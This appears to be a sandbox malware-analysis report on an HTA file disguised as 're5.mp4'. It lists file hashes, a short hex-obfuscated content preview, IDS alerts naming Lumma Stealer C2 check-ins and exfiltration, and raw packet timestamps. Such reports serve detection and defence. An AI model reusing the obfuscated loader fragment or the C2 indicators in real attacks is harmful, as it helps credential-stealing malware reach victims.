                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    File type:data
                                                                                                    Entropy (8bit):6.103636682011715
                                                                                                    TrID:
                                                                                                      File name:re5.mp4.hta
                                                                                                      File size:540'101 bytes
                                                                                                      MD5:5697159735d484d2d4fff3ef06aa6f62
                                                                                                      SHA1:98d8b2509628ab131345992f2d43241913d12557
                                                                                                      SHA256:3098a9c50afcd478c3eeb9b12b3794109c0f3652263bcaf8b0077c413188e4da
                                                                                                      SHA512:c103ee3d2bf6b8e8b649d6b1676e84486d53f2ea03de8827247fb05d3421cb9563b1dadd9e95ce8418d7e19f793a1676bb6e983c7ede5b5eed260e42a73fd448
                                                                                                      SSDEEP:6144:dKqpsbLbkARe7CepXY5eUfdemme0629ecUT5sgIqevBReYbC:HQsu
                                                                                                      TLSH:0AB4B0465A730614D87DC974EEDBCA282071BDC84C0587AE4ACDB43530AB5B87ED6AFC
                                                                                                      File Content Preview:66y75T6eF63o74D69K6fM6eg20Z70s56U72Q53n78Q51C28G6aZ44K58Q49k29Q7bt76f61Z72J20n57O64M63p78S4fq6aB3dm20m27X27K3bX66I6fK72Z20E28i76J61w72M20T52Q4fH6aF70t68d20r3dA20a30N3bF52o4fg6ae70Q68v20z3cq20H6aC44T58d49A2es6cr65i6eR67A74r68g3bh20j52i4fM6aq70X68H2bG2bw29o
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-31T09:26:21.640161+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549983188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:22.107850+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549983188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:22.107850+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549983188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:22.578264+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549984188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:22.998796+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549984188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:22.998796+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549984188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:23.554736+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549986188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:24.095583+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549986188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:24.607228+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549987188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:25.693614+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549988188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:28.157830+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549989188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:29.077559+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549990188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:30.056629+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549991188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:31.060161+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549992188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:31.514585+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549992188.114.96.3443TCP
                                                                                                      2024-12-31T09:26:32.005168+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549993104.21.37.128443TCP
                                                                                                      2024-12-31T09:26:32.385525+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1104.21.37.128443192.168.2.549993TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 31, 2024 09:25:04.829067945 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:04.829101086 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:04.829173088 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:04.835644007 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:04.835663080 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.401141882 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.401474953 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.404705048 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.404716015 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.404952049 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.417901993 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.463340044 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.800460100 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.800503969 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.800535917 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.800560951 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.800565004 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.800585985 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.800800085 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.800807953 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.800904036 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.801067114 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.801354885 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.801398993 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.801433086 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.801443100 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.801455021 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.801481009 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.847254992 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.899977922 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.903525114 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.903561115 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.903585911 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.903595924 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.903676033 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.910501003 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.919043064 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.919068098 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.919178963 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.919188023 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.919961929 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.924896955 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.936219931 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.936249971 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.936295033 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.936302900 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.936449051 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.940232992 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.947191954 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.947218895 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.947244883 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.947253942 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:05.948086023 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:05.957819939 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.001997948 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.002026081 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.002058983 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.002069950 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.002299070 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.004628897 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.008573055 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.008604050 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.008630037 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.008630991 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.008641005 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.008686066 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.014867067 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.014946938 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.014952898 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.020721912 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.021603107 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.021609068 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.026634932 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.026702881 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.026710033 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.038857937 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.038971901 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.038980007 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.047954082 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.047986031 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.048010111 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.048016071 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.048109055 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.051059008 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.051177025 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.051182985 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.057128906 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.057236910 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.057243109 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.063411951 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.063638926 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.063646078 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.069160938 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.069503069 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.069509983 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.078336954 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.078779936 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.078789949 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.079082012 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.083681107 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.083904982 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.092083931 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.092148066 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.096689939 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.096754074 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.102688074 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.102819920 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.106147051 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.106247902 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.111696959 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.111740112 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.117434978 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.117662907 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.120846987 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.121279955 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.124444962 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.124511003 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.130496979 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.130614042 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.136188984 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.136482954 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.136775017 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.136781931 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.137132883 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.139712095 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.139812946 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.143013954 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.143120050 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.146053076 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.146114111 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.149662971 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.149709940 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.152682066 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.152764082 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.156049013 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.156160116 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.159250021 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.159354925 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.162822008 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.162925005 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.181298018 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.181561947 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.181591988 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.181598902 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.181626081 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.181710958 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.181792974 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.181799889 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.181843042 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.182348013 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.182420015 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.183965921 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.184092999 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.185728073 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.185837030 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.189251900 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.189466000 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.191706896 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.191800117 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.196432114 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.196604013 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.197171926 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.197506905 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.200092077 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.200217009 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.202835083 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.203059912 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.205972910 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.206083059 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.208436012 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.208839893 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.212836981 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.212910891 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.215262890 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.215415001 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.218055010 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.218164921 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.222167969 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.222282887 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.223373890 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.223458052 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.225368023 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.225455999 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.227685928 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.227787971 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.229609013 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.229706049 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.231501102 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.231563091 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.235518932 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.235631943 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.235687017 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.236433029 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.237230062 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.237401009 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.240261078 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.240376949 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.248554945 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.248563051 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.248667002 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.249454975 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.249536991 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.252710104 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.252813101 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.252859116 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.252938986 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.254717112 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.254777908 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.256573915 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.256681919 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.258054972 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.258128881 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.259408951 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.259512901 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.262053013 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.262113094 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.263636112 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.263686895 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.266882896 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.266942978 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.269999981 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.270426035 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.270512104 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.270519018 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.271496058 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.271548986 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.271555901 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.272948027 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:06.272994995 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:06.273000956 CET44349707188.114.97.3192.168.2.5
